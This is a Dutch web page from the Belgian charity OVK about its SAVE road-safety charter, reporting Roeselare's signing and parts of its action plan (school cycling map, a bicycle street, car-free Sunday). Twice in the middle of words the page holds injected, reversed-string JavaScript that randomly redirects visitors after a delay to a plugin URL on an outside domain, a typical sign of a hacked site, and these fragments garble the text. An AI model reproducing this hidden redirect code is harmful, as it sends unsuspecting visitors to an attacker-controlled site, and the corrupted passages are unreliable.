Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Roeselare ondertekent als 50e in Vlaanderen het SAVE-charter

De 50e ondertekening van het SAVE-charter is een feit. Op woensdag 8 juli ondertekende Roeselare onder het toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeziend oog van enkele OVK-leden uit West-Vlaanderen het SAVE-charter.

 

Voor Roeselare betekent dit meteen ook het startpunt voor hun actiejaar. Er werd al een SAVE-actieplan opgesteld.

Een greep uit het actieplan:

– Eén van de acties die werd opgenomen in het actieplan van stad Roeselare is het ontwikkelen van een schoolbereikbaarheidskaart in samenwerking met de provincie West-Vlaanderen. Hier staan alle meest aangewezen fietsroutes van en naar middelbare scholen op aangeduid. Deze actie kadert in de doelstelling ‘afstemming van het mobiliteitsbeleid op kinderen en jongeren’.

– Bij de doelstelling ‘opmaak en evaluatie van een verkeersveiligheidsanalyse’ is het optimaliseren van kennisuitwisseling tussen de dienst mobiliteit en de politie een belangrijk actiepunt.

– Ook komt er een fietsstraat in de Kattestraat.

– Er wordt voor het eerst deelgenomen aan de autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toluwe zondag.

– Er zal ingezet worden op het promoten van de blue bike in Roeselare…


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be